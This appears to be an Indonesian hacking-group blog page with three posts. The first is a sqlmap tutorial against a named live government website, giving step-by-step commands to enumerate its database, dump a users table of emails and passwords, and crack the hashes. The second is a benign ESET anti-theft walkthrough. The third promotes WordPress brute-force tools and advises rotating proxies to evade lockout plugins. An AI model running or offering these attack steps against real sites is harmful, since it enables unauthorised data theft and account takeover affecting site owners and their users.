Thursday, July 27, 2017

Kali Linux : SQL Injection dan Auto Crack Hash Password Dengan SQLMap


Yo kembali lagi bersama gw yukinoshita 47 kali ini gw mau sharing tutorial tentang SQL Map banyak jg sih yg request sampe bosan gw denger nya wkwkwkwkwk.

oke kali ini live target tutorial nya http://dev2.kopertis7.go.id seperti gambar dibawah ini bug nya terletak di http://dev2.kopertis7.go.id/gallery_info.php?id=35

 

masukkan perintah

root@yukinoshita47:~# sqlmap -u http://situstarget.com --dbs

contoh :
root@yukinoshita47:~# sqlmap -u http://dev2.kopertis7.go.id/gallery_info.php?id=35 --dbs


biarkan tool nya berjalan seperti gambar dibawa ini


jika muncul persetujuan buat lanjutkan eksekusi ketik y terus tekan enter seperti gambar dibawah ini




jika berhasil maka akan muncul seperti gambar dibawah ini :

lalu untuk melihat tabel dari database tersebut eksekusi perintah

root@yukinoshita47:~# sqlmap -u http://situstarget.com -D namadatabase --table

contoh
root@yukinoshita47:~# sqlmap -u http://dev2.kopertis7.go.id/gallery_info.php?id=35 -D kopertisdb --table


kemudian tekan enter maka akan muncul seperti gambar dibawah ini.

selanjut nya untuk melihat isi dari tabel tersebut perintahnya adalah

root@yukinoshita47:~# sqlmap -u http://situstarget.com -D namadatabase --columns

contoh :
root@yukinoshita47:~# sqlmap -u http://dev2.kopertis7.go.id/gallery_info.php?id=35 -D kopertisdb --columns

kemudian tekan enter maka akan muncul seperti gambar dibawah ini.

setelah itu kolom-kolom dari tabel database tersebut akan kelihatan seperti gambar dibawah ini.

untuk melihat isi dari kolom dan tabel tadi adalah menggunakan perintah.

root@yukinoshita47:~# sqlmap -u http://situstarget.com -D namadatabase -T namatabel -C namakolom --dump

contoh
root@yukinoshita47:~# sqlmap -u http://dev2.kopertis7.go.id/gallery_info.php?id=35 -D kopertisdb -T users -C email,password,user_id,username --dump

 kemudian tekan enter dan akan muncul seperti gambar dibawah ini sqlmap akan meminta persetujuan untuk menggunakan tools lainnya disini saya iya kan dengan menekan y dan kemudian tekan enter

kemudian muncul lagi persetujuan untuk menggunakan metode dictionary attack atau bruteforce tekan aja y kemudian tekan enter.

kemudian ada 3 pilihan

- 1 menggunakan wordlist default bawaan sqlmap
- 2 menggunakan wordlist custom
- 3 menggunakan file wordlist

disini saya pilih aja default dengan menekan 1 kemudian tekan enter

kemudian akan muncul seperti gambar dibawah ini kali ini tergantung keinginan saja disini saya pilih tidak dengan menekan n kemudian tekan enter

biarkan sqlmap crack hash password nya

jika berhasil akan muncul seperti gambar dibawah ini.



oke untuk mencari dimana login nya ya seperti biasa kalian cari aja pake admin finder :p

untuk log pentest dari SQLMap di tutorial ini  klik disini

oke cukup sampe disini tutorial nya sekian dan terimakasih


Garuda Security Hacker Official Team



Official Fanspage : Garuda Security Hacker | Official Fanspage
Official Channel YouTube : Garuda Security Hacker | Official Channel

Mengamankan Perangkat Android dengan ESET Mobile Security



Kali ini gw Yukinoshita47 mau bahas mengenai mobile security sering kita temui masalah di perangkat Android kesayangan kita ini yaitu sebagai berikut :

  • Malware / Virus
  • Nebar Spam / Phising
  • Iklan yang menguras kuota
  • Tukang Ngintip privasi orang 
  • Maling  ataupun Pencuri
  • dan lain-lain
Solusi dari masalah keamanan tersebut adalah  dengan menggunakan aplikasi Antivirus dan Security yaitu

ESET Mobile Security


ESET Mobile Security dapat mengatasi masalah Malware dan sejenisnya


 ESET Mobile Security juga dapat block aplikasi, file dan dokumen yang terinfeksi malware dan sejenis nya


ESET Mobile Security selalu update mengenai laporan keamanan


ESET Mobile Security sudah pasti anti phising dan mendeteksi website yang mengandung unsur phising


dengan ESET Mobile Security kita jadi gampang mau cek permission apps di smartphone android kita. 


ESET Mobile Security dapan mengontrol semua nya dalam satu tempat


ESET Mobile Security terintregasi dengan situs web nya untuk melacak perangkat smartphone yang hilang atau dicuri 


ESET Mobile Security rating nya juga lumayan tinggi



Fitur yang dimiliki oleh ESET Mobile Security

  • Anti Virus
  • Anti Phising
  • Anti Pencurian
  • Filtering SMS dan Telpon 
  • Pemeriksaan Keamanan / Security Audit
  • Laporan Keamanan / Security Report 


 kali ini yang mau gw uji coba dalah fitu Anti Theft nya sebenarnya disini gw gak perlu jelasin dengan detail karena aplikasi mobile saat ini user friendly semua jadi gak perlu dijelasin udah ngerti sendiri.

punya smartphone auto update dan anti gaptek :p

gw jelasin secara singkat aja ya gimana cara menggunakan Anti Theft nya

pertama buka web portal


maka muncul seperti gambar dibawa ini lalu aktifkan dan pilih improve security


 kemudian aktifkan semua nya :v



setting web portal selesai lanjut kemudian setting SIM Guard nya

langkah-langkah nya

  1. enable / aktifkan Guard
  2. enable / aktifkan Notify your friends
  3. Tambah kan trusted friend dengan menekan tombol + di pojok kiri bawah seperti gambar dibawah ini

    NB : dengan mengisi nama dan nomor telpon nya bagian ini nomor hp orang terdekat yang bisa dipercaya



kemudian lanjut pilih menu settings

Pilih security password lalu masukkan password nya  dan pilih save

  

setelah itu contact detail nya isi nama dan nomor hp backup / nomor hp orang yang terdekat dan dipercaya setelah itu save


lanjut ke SMS text Command ini ne yang mau gw uji coba dan inti utama dari pembahasan ini adalah fitur SMS text command.

pertama pilih SMS Password lalu masukin password nya contoh : 11223344 kemudian save





berikut daftar perintah sms commands nya

contoh disini saya menggunakan password : 11223344

fungsi dan cara menggunakan fitur nya

eset lock password  untuk mengunci perangkat android
eset siren  password  untuk membunyikan alarm perangkat
android
eset find password  untuk melacak perangkat
android
eset wipe password  untuk menghapus data perangkat android 

untuk mengeksekusinya kirim sms ke nomor hp yang ada diperangkat android yang sudah terinstall ESET mobile security contoh nomor hp nya : 0869696969

format nya sesuai di atas

kalo ingin mengunci ketik eset lock 11223344 kirim ke 0869696969
kalo ingin bunyikan alarm ketik eset siren 11223344 kirim ke 0869696969
kalo ingin melacak ketik eset find 11223344 kirim ke 0869696969
kalo ingin hapus data ketik eset wipe 11223344 kirim ke 0869696969

contoh disini saya sms pakai hp lain untuk sms ke hp 0869696969 

saya ingin mengunci dengan mengetik eset lock 11223344 kirim ke 0869696969 secara otomatis langsung mengunci perangkat nya



 gambar dibawah ini adalah perangkat yang terkunci oleh ESET Mobile security


kalo mau membuka kuncian nya pilih unlock lalu masukkan password nya



lalu untuk melacak lokasi perangkat via sms Command yaitu untuk contoh dengan cara ketik eset find 11223344 kirim ke 0869696969 maka otomatis perangkat android tersebut membalas SMS Koordinat GPS Google map seperti gambar dibawah ini





gampang kan biar lebih jelas nya coba kalian praktekkan sendiri ya :D
sebagai pesan nya adalah tetap waspada dan jaga lah barang2 berharga kalian termasuk smartphone kalian dari para pencuri dan pihak yang tidak bertanggung jawab.

aktifkan selalu anti theft di perangkat kalian jika terjadi kemalingan ya masih bisa dilacak dan dikerjain itu maling bangsat

bisakah melacak, mengunci, membunyikan alarm, dan menghapus data di smartphone / perangkat android yang telah dicuri tanpa diinstall anti-theft sebelumnya jawaban nya TIDAK...!!!!!!!! JANGAN BERPIKIR KALO ADA AHLI IT DAN HACKER SEMUANYA JADI SERBA GAMPANG GITU MIKIR....!!!!

Garuda Security Hacker Official Team



Official Fanspage : Garuda Security Hacker | Official Fanspage
Official Channel YouTube : Garuda Security Hacker | Official Channel

Tool Wordpress Enumerate And Brute


yoyoyo Kembali lagi dengan gw yukinoshita 47 kali ini gw sharing lagi project tools hacking GSH ya udah lama juga gw gak coding-coding sebenarnya banyak sih project coding yang dikerjakan gw dan teman-teman member GSH lainnya hanya saja masih banyak yang belum kelar wkwkwkwkwkwk.

oke kali ini langsung aja kita ke intinya ya kali ini gw mau share bokep ehh salah yaitu tools Wordpress Enumerate And Brute versi Garuda Security Hacker ya project ini masih dalam tahap pengembangan dan uji coba jika ada error jangan sungkan buat ngasih tau ke kami.

oke langsung saja

Wpbrute.sh - Bahasa Pemograman Bash





WordpressBF - bahasa pemograman python






Jika di tools ini ketika saat bruteforce muncul password nya tapi tidak bisa login berarti kalian kena lockdown oleh plugin security wordpress nya dianjurkan kalian pake VPN / Proxy IP yang dinamis yang tiap bentar IP nya berganti-ganti buat ngatasi pemblokiran dari lockdown plugin security wordpress nya.

LINK MENUJU TOOLS :P

Garuda Security Hacker Official Team



Official Fanspage : Garuda Security Hacker | Official Fanspage
Official Channel YouTube : Garuda Security Hacker | Official Channel